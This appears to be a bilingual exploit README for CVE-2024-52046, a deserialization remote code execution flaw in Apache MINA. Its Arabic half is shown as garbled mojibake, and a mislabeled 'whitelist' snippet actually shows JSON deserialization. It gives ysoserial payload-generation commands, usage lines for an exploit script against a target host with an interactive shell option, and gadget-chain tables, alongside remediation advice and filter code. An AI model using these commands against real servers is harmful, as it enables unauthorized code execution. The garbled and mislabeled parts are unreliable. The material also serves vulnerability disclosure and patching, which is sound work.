Share
## https://sploitus.com/exploit?id=C480B1AD-8DC3-5384-9871-9CB716838996
# โ”€โ”€โ”€ CVE-2024-52046 โ”€โ”€โ”€








# ๐Ÿด AMN SECURITY ๐Ÿด

### ู…ุฑูƒุฒ ุฃุจุญุงุซ ุงู„ุฃู…ู† ุงู„ุณูŠุจุฑุงู†ูŠ | Cyber Security Research Center

[![Website](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/)
[![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw)
[![Email](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)

---











# โš ๏ธ ุซุบุฑุฉ ุฅู„ุบุงุก ุงู„ุชุณู„ุณู„ ููŠ Apache MINA ุชุคุฏูŠ ุฅู„ู‰ ุชู†ููŠุฐ ุฃูˆุงู…ุฑ ุนู† ุจูุนุฏ
### CVE-2024-52046 | CVSS 9.8 | ุญุฑุฌุฉ ุฌุฏุงู‹ (CRITICAL)

---

### ๐Ÿ“‹ ุงู„ู…ู„ุฎุต ุงู„ุชู†ููŠุฐูŠ

ุซุบุฑุฉ ุฃู…ู†ูŠุฉ ุฎุทูŠุฑุฉ ุฌุฏุงู‹ ููŠ ู…ูƒุชุจุฉ **Apache MINA** (Multipurpose Infrastructure for Network Applications) ุชุณู…ุญ ู„ู…ู‡ุงุฌู… ุบูŠุฑ ู…ูุตุงุฏู‚ ุจุชู†ููŠุฐ ุฃูˆุงู…ุฑ ุนุดูˆุงุฆูŠุฉ ุนู† ุจูุนุฏ (RCE) ุนุจุฑ ุฅุฑุณุงู„ ุจูŠุงู†ุงุช ู…ุชุณู„ุณู„ุฉ (Serialized Data) ู…ุตู…ู…ุฉ ุฎุตูŠุตุงู‹.

ุชู‚ุน ุงู„ุซุบุฑุฉ ููŠ ุงู„ู…ูƒูˆู† **ObjectSerializationDecoder** ุงู„ุฐูŠ ูŠุณุชุฎุฏู… ุจุฑูˆุชูˆูƒูˆู„ ุฅู„ุบุงุก ุงู„ุชุณู„ุณู„ ุงู„ุฃุตู„ูŠ ููŠ Java (Native Deserialization) ู„ู…ุนุงู„ุฌุฉ ุงู„ุจูŠุงู†ุงุช ุงู„ูˆุงุฑุฏุฉุŒ ุฏูˆู† ูˆุฌูˆุฏ ูุญูˆุตุงุช ุฃู…ู†ูŠุฉ ุฃูˆ ุถูˆุงุจุท ูƒุงููŠุฉ. ู‡ุฐุง ูŠุณู…ุญ ุจุงุณุชุบู„ุงู„ ุณู„ุณู„ุฉ ุฅู„ุบุงุก ุงู„ุชุณู„ุณู„ ุบูŠุฑ ุงู„ุขู…ู†ุฉ (Unsafe Deserialization) ู„ุชู†ููŠุฐ ูƒูˆุฏ ุถุงุฑ ุนู„ู‰ ุงู„ุฎุงุฏู….

| ุงู„ุนู†ุตุฑ | ุงู„ุชูุงุตูŠู„ |
|--------|----------|
| **CVE** | CVE-2024-52046 |
| **CVSS v3.1** | 9.8 (Critical) |
| **ุงู„ู…ุชุฌู‡** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **ุงู„ู†ูˆุน** | Deserialization of Untrusted Data (CWE-502) |
| **ุงู„ู…ู†ุชุฌ** | Apache MINA |
| **ุงู„ู…ูƒูˆู†** | ObjectSerializationDecoder |
| **ุงู„ุฅุตุฏุงุฑุงุช ุงู„ู…ุชุฃุซุฑุฉ** | ุฌู…ูŠุน ุงู„ุฅุตุฏุงุฑุงุช ู‚ุจู„ ุงู„ุชุตุญูŠุญ |
| **ุงู„ุชุฃุซูŠุฑ** | ุชู†ููŠุฐ ุฃูˆุงู…ุฑ ุนู† ุจูุนุฏ ุบูŠุฑ ู…ูุตุงุฏูŽู‚ |
| **ุงู„ุชุนู‚ูŠุฏ** | ู…ู†ุฎูุถ |

---

### ๐Ÿ” ุชูุงุตูŠู„ ุงู„ุซุบุฑุฉ

Apache MINA ู‡ูˆ ุฅุทุงุฑ ุนู…ู„ ุดุจูƒูŠ ุนุงู„ูŠ ุงู„ุฃุฏุงุก ู„ุชุทูˆูŠุฑ ุชุทุจูŠู‚ุงุช ุงู„ุดุจูƒุงุช ููŠ Java. ูŠุณุชุฎุฏู… ุนู„ู‰ ู†ุทุงู‚ ูˆุงุณุน ููŠ ุงู„ุฃู†ุธู…ุฉ ุงู„ู…ูˆุฒุนุฉ ูˆุฎูˆุงุฏู… ุงู„ุฃู„ุนุงุจ ูˆุชุทุจูŠู‚ุงุช IoT.

ุงู„ู…ูƒูˆู† **ObjectSerializationDecoder** ู…ุณุคูˆู„ ุนู† ููƒ ุชุดููŠุฑ ุงู„ุจูŠุงู†ุงุช ุงู„ู…ุชุณู„ุณู„ุฉ ุงู„ูˆุงุฑุฏุฉ ุนุจุฑ ุงู„ุดุจูƒุฉ. ุงู„ู…ุดูƒู„ุฉ ุฃู†ู‡ ูŠุณุชุฎุฏู… ุทุฑูŠู‚ุฉ `readObject()` ููŠ Java ู…ุจุงุดุฑุฉ ุฏูˆู† ุฃูŠ ุชุญู‚ู‚ ู…ู† ุณู„ุงู…ุฉ ุงู„ุจูŠุงู†ุงุช ุฃูˆ ุชุตููŠุฉ ู„ู„ูุฆุงุช ุงู„ู…ุณู…ูˆุญ ุจู‡ุง.

#### ูƒูŠู ุชุนู…ู„ ู‡ุฌู…ุงุช ุฅู„ุบุงุก ุงู„ุชุณู„ุณู„ ููŠ JavaุŸ

```
ุจูŠุงู†ุงุช ู…ุชุณู„ุณู„ุฉ ูˆุงุฑุฏุฉ (ุจุงูŠุช)
      โ”‚
      โ–ผ
ObjectSerializationDecoder.readObject()
      โ”‚
      โ–ผ
[ู„ุง ูŠูˆุฌุฏ ุชุญู‚ู‚ ุฃู…ู†ูŠ] โ† ุงู„ุฎู„ู„ ู‡ู†ุง
      โ”‚
      โ–ผ
ุฅู†ุดุงุก ูƒุงุฆู†ุงุช Java ู…ู† ุงู„ุจูŠุงู†ุงุช
      โ”‚
      โ–ผ
ูŠู…ูƒู† ู„ู„ู…ู‡ุงุฌู… ุชุถู…ูŠู† gadgets ุถุงุฑุฉ
      โ”‚
      โ–ผ
ุชู†ููŠุฐ ุฃูˆุงู…ุฑ ุงู„ู†ุธุงู… โ† RCE
```

#### ุณู„ุณู„ุฉ ุงู„ุงุณุชุบู„ุงู„ (Gadget Chain)

```
ObjectInputStream.readObject()
      โ”‚
      โ–ผ
HashMap.readObject()
      โ”‚
      โ–ผ
Runtime.exec() โ† ุนุจุฑ ุณู„ุณู„ุฉ gadgets
      โ”‚
      โ–ผ
ุฃู…ุฑ ุงู„ู†ุธุงู… ุงู„ู‡ุฏู โ† ุชู†ููŠุฐ
```

#### ุงู„ู€ Gadgets ุงู„ุดุงุฆุนุฉ ู„ุงุณุชุบู„ุงู„ Java Deserialization

| ุงู„ู…ูƒุชุจุฉ | ุงู„ู€ Gadget | ุงู„ุญุงู„ุฉ |
|---------|-----------|--------|
| Commons Collections 3.1 | AnnotationInvocationHandler | โœ… ุงู„ุฃูƒุซุฑ ุดูŠูˆุนุงู‹ |
| Commons Collections 4.0 | TreeBag / TreeMap | โœ… ู…ุชูˆูุฑ |
| JRE 8u20 | HashSet / Hashtable | โœ… ู…ุญุฏูˆุฏ |
| Spring Beans | MethodInvoker | โœ… ู…ุชูˆูุฑ |
| Groovy | MethodClosure | โœ… ู…ุชูˆูุฑ |
| Jackson | ObjectMapper | โœ… ู…ุน ุฅุตุฏุงุฑุงุช ู…ุญุฏุฏุฉ |

---

### ๐Ÿ’ฅ ุขู„ูŠุฉ ุงู„ู‡ุฌูˆู…

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚   Attacker      โ”‚     โ”‚  Target Server   โ”‚     โ”‚  Vulnerable App  โ”‚
โ”‚   (Unauth)      โ”‚     โ”‚  (Apache MINA)   โ”‚     โ”‚  (Java Runtime)  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜     โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜     โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
         โ”‚                       โ”‚                        โ”‚
         โ”‚  1. Scan for MINA     โ”‚                        โ”‚
         โ”‚  service on network   โ”‚                        โ”‚
         โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บโ”‚                        โ”‚
         โ”‚                       โ”‚                        โ”‚
         โ”‚  2. Send crafted      โ”‚                        โ”‚
         โ”‚  serialized Java      โ”‚                        โ”‚
         โ”‚  object payload       โ”‚                        โ”‚
         โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บโ”‚                        โ”‚
         โ”‚                       โ”‚                        โ”‚
         โ”‚  3. MINA receives     โ”‚                        โ”‚
         โ”‚  & deserializes       โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บโ”‚
         โ”‚                       โ”‚                        โ”‚
         โ”‚                       โ”‚  4. Gadget chain       โ”‚
         โ”‚                       โ”‚  activates             โ”‚
         โ”‚                       โ”‚  โ”€โ”€โ–บ Runtime.exec()    โ”‚
         โ”‚                       โ”‚โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”‚
         โ”‚                       โ”‚                        โ”‚
         โ”‚  5. Command executed  โ”‚                        โ”‚
         โ”‚  on target server    โ”‚                        โ”‚
         โ”‚โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค                        โ”‚
         โ”‚                       โ”‚                        โ”‚
```

---

### ๐Ÿงช ุงุณุชุฎุฏุงู… ุงู„ุฃุฏุงุฉ

```bash
# ุฅู†ุดุงุก ุญู…ูˆู„ุฉ ุจุงุณุชุฎุฏุงู… ysoserial
java -jar ysoserial.jar CommonsCollections3 'id > /tmp/pwned' > payload.bin

# ุงุณุชุบู„ุงู„ Apache MINA
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "id"

# ูุญุต ุงู„ุฎุฏู…ุฉ
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --check

# ุงุณุชุฎุฏุงู… gadget ู…ุฎุชู„ู
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "whoami" \
    --gadget CommonsCollections6

# ุนุจุฑ ุจุฑูˆูƒุณูŠ
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "ipconfig" \
    --proxy http://127.0.0.1:8080

# ูˆุถุน ุชูุงุนู„ูŠ
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --shell
```

#### ุงู„ุฎูŠุงุฑุงุช ุงู„ู…ุชุงุญุฉ

| ุงู„ุฎูŠุงุฑ | ุงู„ูˆุตู |
|--------|-------|
| `-t, --target` | ุนู†ูˆุงู† ุงู„ุฎุงุฏู… ุงู„ู…ุณุชู‡ุฏู |
| `-p, --port` | ู…ู†ูุฐ ุฎุฏู…ุฉ Apache MINA |
| `-c, --command` | ุงู„ุฃู…ุฑ ุงู„ู…ุฑุงุฏ ุชู†ููŠุฐู‡ |
| `--check` | ูุญุต ูˆุฌูˆุฏ ุงู„ุซุบุฑุฉ ูู‚ุท |
| `--shell` | ูˆุถุน ุดูŠู„ ุชูุงุนู„ูŠ |
| `--gadget` | ุชุญุฏูŠุฏ gadget chain (ุงูุชุฑุงุถูŠ: CommonsCollections3) |
| `--proxy` | ุจุฑูˆูƒุณูŠ HTTP |
| `--ysoserial-path` | ู…ุณุงุฑ ysoserial.jar |
| `-v, --verbose` | ุฅุธู‡ุงุฑ ุชูุงุตูŠู„ ุฅุถุงููŠุฉ |

---

### ๐Ÿ›ก๏ธ ุงู„ุฅุฌุฑุงุกุงุช ุงู„ุนู„ุงุฌูŠุฉ

| ุงู„ุฅุฌุฑุงุก | ุงู„ุฃูˆู„ูˆูŠุฉ | ุงู„ูˆุตู |
|---------|----------|-------|
| **ุชุญุฏูŠุซ Apache MINA** | ๐ŸŸข ููˆุฑูŠ | ุชุญุฏูŠุซ ุงู„ู…ูƒุชุจุฉ ุฅู„ู‰ ุฃุญุฏุซ ุฅุตุฏุงุฑ |
| **ุชุนุทูŠู„ ObjectSerializationDecoder** | ๐ŸŸข ุนุงุฌู„ | ุงุณุชุฎุฏุงู… ุจุฏูŠู„ ุขู…ู† ุฃูˆ ุชุนุทูŠู„ Serialization |
| **ุชูุนูŠู„ Filtering** | ๐ŸŸก ู…ู‡ู… | ุงุณุชุฎุฏุงู… JEP 290 (ObjectInputFilter) |
| **ุงุณุชุฎุฏุงู… Whitelist** | ๐ŸŸก ู…ู‡ู… | ุชุญุฏูŠุฏ ุงู„ูุฆุงุช ุงู„ู…ุณู…ูˆุญ ุจุฅู„ุบุงุก ุชุณู„ุณู„ู‡ุง ูู‚ุท |
| **DMZ Network** | ๐Ÿ”ต ู…ุณุชู…ุฑ | ูุตู„ ุงู„ุฎุฏู…ุงุช ุงู„ู…ุนุฑุถุฉ ุนู† ุงู„ุดุจูƒุฉ ุงู„ุฏุงุฎู„ูŠุฉ |

#### ุชุทุจูŠู‚ JEP 290 (ObjectInputFilter)

```java
// ุชุทุจูŠู‚ ูู„ุชุฑ ุนู„ู‰ ู…ุณุชูˆู‰ JVM
ObjectInputFilter filter = ObjectInputFilter.Config
    .createFilter("!com.example.*;java.base/*;!*");
ObjectInputFilter.Config.setSerialFilter(filter);

// ุฃูˆ ุนู„ู‰ ู…ุณุชูˆู‰ ObjectStream
ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filter);
```

#### ุงุณุชุฎุฏุงู… Whitelist ุขู…ู†

```java
// ุจุฏูŠู„ ุขู…ู† ู„ู€ ObjectSerializationDecoder
// ุงุณุชุฎุฏุงู… JSON/YAML ุจุฏู„ุงู‹ ู…ู† Java Serialization
ObjectMapper mapper = new ObjectMapper();
MyObject obj = mapper.readValue(jsonInput, MyObject.class);
```

---

### ๐Ÿ“Š ุงู„ุชุฃุซูŠุฑ ุนู„ู‰ ุงู„ุฃู†ุธู…ุฉ ุงู„ู…ุฎุชู„ูุฉ

| ู†ูˆุน ุงู„ู†ุธุงู… | ู…ุณุชูˆู‰ ุงู„ุชุฃุซูŠุฑ | ุงู„ุดุฑุญ |
|-----------|---------------|-------|
| ุฎูˆุงุฏู… ุงู„ุฃู„ุนุงุจ | ๐Ÿ”ด ุนุงู„ูŠ | Apache MINA ุดุงุฆุน ููŠ ุฎูˆุงุฏู… ุงู„ุฃู„ุนุงุจ Massive Multiplayer |
| ุชุทุจูŠู‚ุงุช IoT | ๐Ÿ”ด ุนุงู„ูŠ | ูŠุณุชุฎุฏู… ููŠ ุฃู†ุธู…ุฉ ุฅู†ุชุฑู†ุช ุงู„ุฃุดูŠุงุก ูˆุงู„ุงุชุตุงู„ุงุช ู…ู†ุฎูุถุฉ ุงู„ุชุฃุฎูŠุฑ |
| ุงู„ุฃู†ุธู…ุฉ ุงู„ู…ุงู„ูŠุฉ | ๐Ÿ”ด ุนุงู„ูŠ | ุฃู†ุธู…ุฉ ุงู„ุชุฏุงูˆู„ ุนุงู„ูŠุฉ ุงู„ุชุฑุฏุฏ ุชุณุชุฎุฏู… MINA |
| ุชุทุจูŠู‚ุงุช ุงู„ุฏุฑุฏุดุฉ | ๐ŸŸก ู…ุชูˆุณุท | ุฎูˆุงุฏู… ุงู„ุฏุฑุฏุดุฉ ุงู„ู…ุจุงุดุฑุฉ |
| ุงู„ุชุทุจูŠู‚ุงุช ุงู„ู…ุฎุตุตุฉ | ๐ŸŸก ู…ุชูˆุณุท | ุฃูŠ ุชุทุจูŠู‚ Java ูŠุณุชุฎุฏู… MINA ู„ู„ุงุชุตุงู„ุงุช ุงู„ุดุจูƒูŠุฉ |

---

### ๐Ÿ”— ุงู„ู…ุฑุงุฌุน

- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2024-52046
- **Apache Advisory**: https://lists.apache.org/thread/CVE-2024-52046
- **CWE-502**: https://cwe.mitre.org/data/definitions/502.html
- **ysoserial**: https://github.com/frohoff/ysoserial
- **JEP 290**: https://openjdk.org/jeps/290

> โš ๏ธ **ุฅุฎู„ุงุก ู…ุณุคูˆู„ูŠุฉ**: ู‡ุฐุง ุงู„ุชู‚ุฑูŠุฑ ู„ุฃุบุฑุงุถ ุชุนู„ูŠู…ูŠุฉ ูˆุจุญุซูŠุฉ ูู‚ุท. ุงุณุชุฎุฏุงู… ู‡ุฐู‡ ุงู„ู…ุนู„ูˆู…ุงุช ู„ุฃุบุฑุงุถ ุบูŠุฑ ู‚ุงู†ูˆู†ูŠุฉ ูŠุชุญู…ู„ ุงู„ู…ุณุชุฎุฏู… ู…ุณุคูˆู„ูŠุชู‡ ุจุงู„ูƒุงู…ู„.

---

### ๐Ÿ”— ุชูˆุงุตู„ ู…ุน AMN SECURITY

[![Website](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/)
[![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw)
[![Email](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)



---







# โš ๏ธ CVE-2024-52046 โ€” Apache MINA Deserialization Remote Code Execution

### CVSS 9.8 | CRITICAL | Unauthenticated Remote Code Execution

---

### Executive Summary

**CVE-2024-52046** is a critical unauthenticated Remote Code Execution vulnerability in the **Apache MINA** framework. The **ObjectSerializationDecoder** component uses Java's native deserialization protocol to process incoming serialized data without adequate security checks, allowing attackers to exploit the deserialization process by sending specially crafted malicious serialized objects.

Apache MINA is a high-performance network application framework used extensively in distributed systems, gaming servers, IoT applications, and financial trading platforms.

| Field | Value |
|-------|-------|
| **CVE** | CVE-2024-52046 |
| **CVSS v3.1** | 9.8 (Critical) |
| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Type** | Deserialization of Untrusted Data (CWE-502) |
| **Product** | Apache MINA |
| **Component** | ObjectSerializationDecoder |
| **Impact** | Unauthenticated Remote Code Execution |

---

### Vulnerability Details

The `ObjectSerializationDecoder` in Apache MINA directly calls Java's `readObject()` method without validating the incoming data stream. An attacker can craft a serialized Java object containing a gadget chain that executes arbitrary system commands upon deserialization.

#### Common Gadget Chains

| Library | Gadget | Status |
|---------|--------|--------|
| Commons Collections 3.1 | AnnotationInvocationHandler | โœ… Most common |
| Commons Collections 4.0 | TreeBag / TreeMap | โœ… Available |
| JRE 8u20 | HashSet / Hashtable | โœ… Limited |
| Spring Beans | MethodInvoker | โœ… Available |
| Groovy | MethodClosure | โœ… Available |

### Tool Usage

```bash
# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections3 'id > /tmp/pwned' > payload.bin

# Exploit Apache MINA
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "id"

# Check for vulnerability
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --check

# Use different gadget
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "whoami" \
    --gadget CommonsCollections6

# Interactive shell
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --shell
```

### Remediation

| Action | Priority | Description |
|--------|----------|-------------|
| **Update MINA** | ๐Ÿ”ด Immediate | Update to latest patched version |
| **Disable Decoder** | ๐Ÿ”ด Urgent | Switch to alternative safe decoder |
| **Enable Filtering** | ๐ŸŸก Important | Implement JEP 290 ObjectInputFilter |
| **Use Whitelist** | ๐ŸŸก Important | Allow only trusted classes |

#### JEP 290 Implementation

```java
ObjectInputFilter filter = ObjectInputFilter.Config
    .createFilter("!com.example.*;java.base/*;!*");
ObjectInputFilter.Config.setSerialFilter(filter);
```

### Impact by System Type

| System Type | Impact Level | Description |
|------------|-------------|-------------|
| Game Servers | ๐Ÿ”ด Critical | MINA is common in MMO game servers |
| IoT Systems | ๐Ÿ”ด Critical | Low-latency IoT communication |
| Financial Systems | ๐Ÿ”ด Critical | High-frequency trading platforms |
| Chat Applications | ๐ŸŸก Medium | Real-time messaging servers |

### References

- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2024-52046
- **CWE-502**: https://cwe.mitre.org/data/definitions/502.html
- **ysoserial**: https://github.com/frohoff/ysoserial
- **JEP 290**: https://openjdk.org/jeps/290

---

### Connect with AMN SECURITY

๐ŸŒ **Website**: https://amn.amnoffsec.workers.dev/
๐Ÿ“ธ **Instagram**: https://www.instagram.com/ixctw
๐Ÿ“ง **Email**: ayman.mahmoudoffsec@gmail.com

---

> โš ๏ธ **Disclaimer**: This report is for educational and research purposes only. Unauthorized use of this information is illegal and the user bears full responsibility.